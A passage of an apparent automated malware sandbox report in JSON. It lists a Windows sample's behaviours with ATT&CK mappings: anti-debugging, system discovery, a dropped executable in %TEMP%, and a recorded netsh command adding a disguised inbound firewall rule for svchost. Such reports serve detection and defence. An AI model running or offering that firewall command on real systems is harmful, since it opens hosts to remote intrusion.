"attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 723D0000\n \"hfopyujf.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 723D0000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 723D0000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"netsh.exe\" at 00000000-00002780-00000105-6096794", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" queries volume information of \"C:\\\" at 00000000-00005864-0000010C-1725096\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" queries volume information of \"C:\\\" at 00000000-00005864-0000010C-1726312\n \"hfopyujf.exe\" queries volume information of \"C:\\\" at 00000000-00002240-0000010C-2205167\n \"hfopyujf.exe\" queries volume information of \"C:\\\" at 00000000-00002240-0000010C-2206504\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002700-0000010C-91810\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002700-0000010C-380295\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002700-0000010C-794329\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002700-0000010C-795765", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c5e7743794d75ffffffff0c0000004c625e771f794d75ffffffff0c00000064ec120004000000000400000100000078ec12000a0e2c0000000000 (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031006a0600000088ea9d75ecf91200b344616a88000000000000000000000000000000000000000000000000000000880000000000000000000000000000002c6b4000dc68f9b4bcf51200616b400088000000f822410081a89d75ecf912000000900100fed800000200000800000067335d00 (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebca76b022240000b0fd7f9a5c607700e0fd7fb0c9690144b0fd7f00000000400000003f0000002500000000b0fd7fa4c96901c15c6077608267772500000000b0fd7f9a5c607700e0fd7fc8c9690157895f778083677713174e75d8ebca76 (UID: 00000000-00005864)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000088773600f4f65d00145c5f77435c5f77c0f75d0001000000940134000100000074f65d00935c607740836777d4a05f77afcc3577c0f75d00010000000100000000e036000000000044f65d0074f65d00e0f65d0095e15b77233e3700feffffffd4a05f771bbe4d750000e77500000000 (UID: 00000000-00005960)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000b8de2a0074f75600145c5f77435c5f7740f85600010000009401280001000000f4f65600935c607740836777d4a05f77fabc3e7740f85600010000000100000048242b0000000000c4f65600f4f6560060f7560095e15b77f64e3700feffffffd4a05f771bbe4d750000e77500000000 (UID: 00000000-00005972)\n \"hfopyujf.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000060dc25003cfc5300145c5f77435c5f7708fd5300010000009401230001000000bcfb5300935c607740836777d4a05f77b1aa3b7708fd5300010000000100000008ea2500000000008cfb5300bcfb530028fc530095e15b77f5553700feffffffd4a05f771bbe4d750000e77500000000 (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c5e7743794d75ffffffff0c0000004c625e771f794d75ffffffff0c00000064ec120004000000000400000100000078ec12000a0e440000000000 (UID: 00000000-00002240)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"cmd.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006104)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-225", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the host name of a computer", "description": "\"svchost.exe\" called \"gethostname\" with parameter %OSUSER%-PC & 128 (UID: 00000000-00002700)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 0040B33Dh\" at 00000000-00002240-31383-273-0040B211", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005864)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005864)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00002780)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" queries volume information of \"C:\\\" at 00000000-00005864-0000010C-1725096\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" queries volume information of \"C:\\\" at 00000000-00005864-0000010C-1726312\n \"hfopyujf.exe\" queries volume information of \"C:\\\" at 00000000-00002240-0000010C-2205167\n \"hfopyujf.exe\" queries volume information of \"C:\\\" at 00000000-00002240-0000010C-2206504\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002700-0000010C-91810\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002700-0000010C-380295\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002700-0000010C-794329\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002700-0000010C-795765", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001200780e1900fce2120080f47477000019000000000089f474777dd712b70200000070e312006ce3120064e2120068e2120018e4120095e15b771e133700c0e21200c83a7e7734e31200d58c767770e3120004e3120042a47477a8027e7744e31200d2f47477080000006ef5747744f57477c5d612b70200000070aa3d720000130026bb3d7218e31200020000000000130070aa3d7248e3120042a47477a8027e778ce3120010a93d7208000000e6a83d7212f51ab40200000070aa3d720000130026bb3d72ac0e1900780e190058e312008050497218e41200f9f2417276be35c6 (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000ed052b280300000044e569013c7982b5ac1700008ce56901c0e46901590000000300000048e4690150e4690118e66901d0bb626a080d8fdefeffffff98e56901bfe5616aed052b2898e56901cce5616a060000000000c86a01000000dfe5616a3333ff040600000003000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4e56901000000008e00000044e66901feffffffcce56901cf006077d6006077c2ea01768e0000004700000044e6690100000000a0e569010000000008e66901 (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036003fcfe0b544de69016d827f758c54250004010000 (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000660065006600620032003400360034003700660061003400330036003800390030006600660035003800310061003600650033003300390034003500650031006100310037003600360034003600300036006500310036006500610062003500620034002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b5f77fec70176d8ebca76ac011c0000001c0000000000000000000400e800c9000000000000000000000000000000000000000500e300c9000000000000000000000008701c0000000000200000000000000000000000 (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001c00a8882600000000003e00003e340000c0d08a2600d89e2600483c2600f001000000001c0004000000a8882600acee690104645f7738011c00e0635f77a2e101760000000000001c00b08826006dd19d75c91469b66cae84750000000000000000f0010000d89e2600d82f1c000100000000001c0050011c000c000000b0882600d82f1c00020000021800000022220000820000000000000000000000030000004cee6901820000007f070000000000002222000002000000c075a575d89e260000000000c075a57568ee6901e8301c0000000000d82f1c00c0ee6901ff2b5f77 (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000007c38cb930300000044e569013c7982b5a00f00008ce56901c0e469015b0000000300000048e4690150e4690118e66901d0bb626a080d8fdefeffffff98e56901bfe5616a7c38cb9398e56901cce5616a820500000000c86a01000000dfe5616a3333ff048205000004000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001c00c0e92300000000003e00003e340000c0e8eb230060ef230020bd2300f001000000001c0004000000c0e92300acee690104645f7738011c00e0635f77a2e101760000000000001c00c8e923006dd19d75c91469b66cae84750000000000000000fc00000060ef2300d82f1c000100000000001c0050011c000c000000c8e92300d82f1c0002000002180000005a020058820000000000000000000000030000004cee690182000000da01000000000000ae27008902000000c075a5757882270000000000c075a57568ee690134301c0000000000d82f1c00c0ee6901ff2b5f77 (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000c26a1f9b0300000044e569013c7982b5b80400008ce56901c0e469015b0000000300000048e4690150e4690118e66901d0bb626a080d8fdefeffffff98e56901bfe5616ac26a1f9b98e56901cce5616a820500000000c86a01000000dfe5616a3333ff048205000005000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005864)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"IsWow64Process\" with parameter \"5864\" - (UID: 00000000-00005864)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"hfopyujf.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002780)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"FindFirstFileW\" with parameter C:\\cmd.* (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\cmd.* (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"FindNextFileW\" with parameter cmd.exe (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"FindFirstFileW\" with parameter C:\\sc.* (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\sc.* (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"FindNextFileW\" with parameter sc.exe (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"FindFirstFileW\" with parameter C:\\netsh.* (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\netsh.* (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"FindNextFileW\" with parameter netsh.exe (UID: 00000000-00005864)\n \"cmd.exe\" called \"FindFirstFileW\" with parameter C:\\ (UID: 00000000-00006104)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"sc.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"hfopyujf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"hfopyujf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"netsh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"sc.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"2a61d0\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"2161800\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"36\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00002780)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00002780)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"hfopyujf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\DZHRYSUY\"; Key: \"IMAGEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hfopyujf.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" wrote 32256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hfopyujf.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"hfopyujf.exe.67EE4A7A.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"hfopyujf.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\hfopyujf.exe]- [targetUID: 00000000-00005864]\n \"DISMHOST.EXE.67EE5D5B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 